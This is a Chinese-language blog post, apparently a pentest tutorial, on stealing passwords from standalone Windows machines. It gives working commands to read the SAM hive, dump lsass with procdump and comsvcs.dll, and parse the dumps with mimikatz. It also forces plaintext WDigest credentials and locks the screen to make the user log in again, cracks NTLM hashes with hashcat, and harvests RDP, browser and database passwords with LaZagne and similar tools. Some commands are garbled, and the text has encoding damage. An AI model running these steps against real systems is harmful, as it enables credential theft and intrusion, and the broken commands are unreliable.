本文詳細(xì)介紹了在非域環(huán)境下����,針對(duì)Windows系統(tǒng)獲取密碼的四種方法���,包括在線讀取SAM文件、離線讀取SAM和lsass進(jìn)程�,以及使用procdump、Power_sploit腳本���、comsvcs.dll和密碼破解工具如Hashcat�。還涵蓋了RDP憑證抓取和瀏覽器密碼竊取的技巧�。
對(duì)于Windows(不是域環(huán)境)我們有四種方法去抓取它的密碼
在線讀取SAM文件
離線讀取SAM文件
在線讀取Lsass進(jìn)程
離線讀取Lsass進(jìn)程
在這次的blog,我們還是用的mimkatz
目錄
1.在線讀取SAM文件
2.離線讀取sam文件
3.在線讀取lsass進(jìn)程
4.離線讀取lsass進(jìn)程
1.任務(wù)管理器DUMP
2.通過(guò)procdump工具進(jìn)行dump
3.Power_sploit的Out_minidump的腳本
4.白名單文件 comsvcs.dll
破解lsass.dmp
5.Hashcat
6.RDP憑證抓取
1.通過(guò)cmd讀取
2.文件夾讀取
7.瀏覽器���,數(shù)據(jù)庫(kù)密碼信息讀取
1.BrowserGhost
2.Sharp-HackBrowserData
3.數(shù)據(jù)庫(kù)密碼抓取
4.抓取各類密碼 LaZagne
1.在線讀取SAM文件
這個(gè)就是最簡(jiǎn)單的一個(gè)做法�����,直接在mimikatz上面敲上這個(gè)的命令
-
-
-
這個(gè)是沒(méi)有問(wèn)題的�,只不過(guò)它只能讀取到NTLM hash
2.離線讀取sam文件
因?yàn)槲覀冎苯釉谀繕?biāo)機(jī)器上面讀取hash可能會(huì)報(bào)毒(本身運(yùn)行mimikatz也會(huì)報(bào)毒)所以我們就可以離線讀取��,其實(shí)就是將它的注冊(cè)表中的sam導(dǎo)出
-
reg save hklm\sam sam.hive
-
reg save hklm\system system.hive
就可以看見(jiàn)這兩個(gè)文件
然后就是用本地的Mimikatz去導(dǎo)出
lsadump::sam /sam:sam.hive /system:system.hive
也是能達(dá)到相應(yīng)的效果的?�。��。��?����!
3.在線讀取lsass進(jìn)程
這個(gè)呢,在某一些win10可以��,但是在win11是不行的?��。����。�����。ㄗ钇鸫a我的不行)
lsass進(jìn)程中����,存儲(chǔ)的是用戶的明文密碼,所以可能這就是導(dǎo)不出來(lái)的原因
-
-
win11是會(huì)直接報(bào)這樣的錯(cuò)的(版本什么的我也試過(guò)了�,而且我已經(jīng)是重新將密碼寫回到了注冊(cè)表)
但是對(duì)于某些win10,以及win server2012 xp 等低版本是可以的
順便提一嘴�����,在一些win10版本
首先肯定是要寫入計(jì)劃表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
如果你想獲取明文密碼可以直接用以下命令
-
rundll32.exe user32.dll,LockWorkStation //這個(gè)可以直接鎖屏
-
-
-
-
-
-
query user //得到當(dāng)前用戶得id
-
都能把用戶踢下線 �,當(dāng)他再輸密碼得時(shí)候,我們就可以讀取lsass進(jìn)程得明文密碼
4.離線讀取lsass進(jìn)程
離線讀取lsass進(jìn)程,其實(shí)就是想辦法直接把對(duì)應(yīng)得文件dump出來(lái)
1.任務(wù)管理器DUMP
前提是你得能遠(yuǎn)程到別人得電腦�,然后直接在任務(wù)管理器能把他dump出來(lái)
然后你就能得到這樣的文件
2.通過(guò)procdump工具進(jìn)行dump
ProcDump 是一個(gè)命令行實(shí)用工具����,其主要用途是監(jiān)視應(yīng)用程序的 CPU 峰值��,并在出現(xiàn)峰值期間生成故障轉(zhuǎn)儲(chǔ)�����,管理員或開發(fā)人員可以使用這些轉(zhuǎn)儲(chǔ)來(lái)確定出現(xiàn)峰值的原因�����。 ProcDump 還支持掛起窗口監(jiān)視(使用與 Windows 和任務(wù)管理器使用的窗口掛起相同的定義)���、未處理的異常監(jiān)視,并且可以根據(jù)系統(tǒng)性能計(jì)數(shù)器的值生成轉(zhuǎn)儲(chǔ)����。 它還可用作可嵌入到其他腳本中的常規(guī)進(jìn)程轉(zhuǎn)儲(chǔ)實(shí)用工具。
這個(gè)是微軟自己寫的工具�,一般不會(huì)報(bào)毒(360不是一般的軟件)
procdump.exe -accepteula ma sass.exe lsass.dmp
3.Power_sploit的Out_minidump的腳本
通過(guò)這個(gè)腳本是可以dump出明文hash的
但是可以能對(duì)win11不太友好,反正我是不行
4.白名單文件 comsvcs.dll
通過(guò)調(diào)用這個(gè)文件的api��,可以幫我們導(dǎo)出lsass進(jìn)程
tasklist | findstr "lsass.exe" //查找lsass進(jìn)程的pid
powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full"
這樣我們就可以在c盤下看見(jiàn)一個(gè)lsass.dmp的文件啦
破解lsass.dmp
這個(gè)是可以用mimkatz去進(jìn)行破解的?���?��!
-
-
sekurlsa::minidump lsass.dmp
-
sekurlsa::logonpasswords full
對(duì)于一些winserver 就算是2012以后的也是可以的
但是win11還是不行(我真是無(wú)語(yǔ)了)
5.Hashcat
這個(gè)可以跑多種的密碼包括ntlmhash
假如我們現(xiàn)在有這樣的一個(gè)ntlm hash
e25bbe456dd96a635f4434511788e502
然后用hashcat
hashcat.exe -m ntlm_hash "字典" --force
可以看見(jiàn)是能跑出來(lái)的
6.RDP憑證抓取
1.通過(guò)cmd讀取
如果我們進(jìn)入內(nèi)網(wǎng)之后,我們可以信息收集的時(shí)候先敲上這樣的一條命令
keycmd /list
如果在這臺(tái)電腦上登錄過(guò)其他的電腦�,而且還勾選了記住我的憑證就會(huì)出現(xiàn)以下結(jié)果
2.文件夾讀取
敲上這樣的一個(gè)命令
dir /a %userprofile%\appdata\local\microsoft\credentials\*
這里放著的都是它的登錄記錄
解密的話,可以用mimikatz進(jìn)行解密
7.瀏覽器���,數(shù)據(jù)庫(kù)密碼信息讀取
1.BrowserGhost
這個(gè)就直接運(yùn)行就好�,不過(guò)只能抓chrome的(我沒(méi)用chrome)
2.Sharp-HackBrowserData
這個(gè)用的比較多�,可以直接抓取你的瀏覽器得密碼
Sharp-HackBrowserData.exe //直接運(yùn)行就好
是真的可以抓到,他會(huì)生成在result文件夾里面
3.數(shù)據(jù)庫(kù)密碼抓取
直接運(yùn)行這個(gè)文件
SharpDecryptPwd.exe -NavicatCrypto
后面就是你的參數(shù)了
4.抓取各類密碼 LaZagne
這個(gè)工具就比較強(qiáng)大了�,基本上可以抓很多東西
lazagne.exe all
這是win11得
在win server 2012中我是dump出了它的ntlm 和lm hash
該文章在 2024/7/16 17:08:54 編輯過(guò)
400 186 1886
